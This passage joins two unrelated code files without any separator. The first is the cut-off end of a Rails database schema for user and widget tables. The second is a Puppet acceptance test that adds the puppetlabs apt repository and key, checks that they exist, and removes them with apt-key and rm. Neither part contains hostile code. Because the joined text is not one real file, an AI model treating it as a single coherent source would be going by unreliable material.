"reference", limit: 45 t.integer "nationality", limit: 4 t.string "headline", limit: 255 t.string "location", limit: 255 t.string "current", limit: 255 t.string "previous", limit: 255 t.string "education", limit: 255 t.integer "language", limit: 4 t.string "slogan", limit: 255 t.integer "active", limit: 4 t.string "question", limit: 255 t.string "answer", limit: 255 end add_index "user", ["id"], name: "id", using: :btree add_index "user", ["name"], name: "name", type: :fulltext create_table "user_widget", force: :cascade do |t| t.integer "user", limit: 4 t.string "widget", limit: 255 t.text "widget_keys", limit: 4294967295 t.text "widget_values", limit: 4294967295 end create_table "widget", force: :cascade do |t| t.string "name", limit: 255 t.string "alias", limit: 30 t.integer "enable", limit: 4 end end
require 'spec_helper_system' describe 'apt::source' do context 'reset' do it 'clean up puppetlabs repo' do shell('apt-key del 4BD6EC30') shell('rm /etc/apt/sources.list.d/puppetlabs.list') end end context 'apt::source' do it 'should work with no errors' do pp = <<-EOS include '::apt' apt::source { 'puppetlabs': location => 'http://apt.puppetlabs.com', repos => 'main', key => '4BD6EC30', key_server => 'pgp.mit.edu', } EOS puppet_apply(pp) do |r| r.exit_code.should_not == 1 end end describe 'key should exist' do it 'finds puppetlabs key' do shell('apt-key list | grep 4BD6EC30') do |r| r.exit_code.should be_zero end end end describe 'source should exist' do describe file('/etc/apt/sources.list.d/puppetlabs.list') do it { should be_file } end end end context 'reset' do it 'clean up puppetlabs repo' do shell('apt-key del 4BD6EC30') shell('rm /etc/apt/sources.list.d/puppetlabs.list') end end end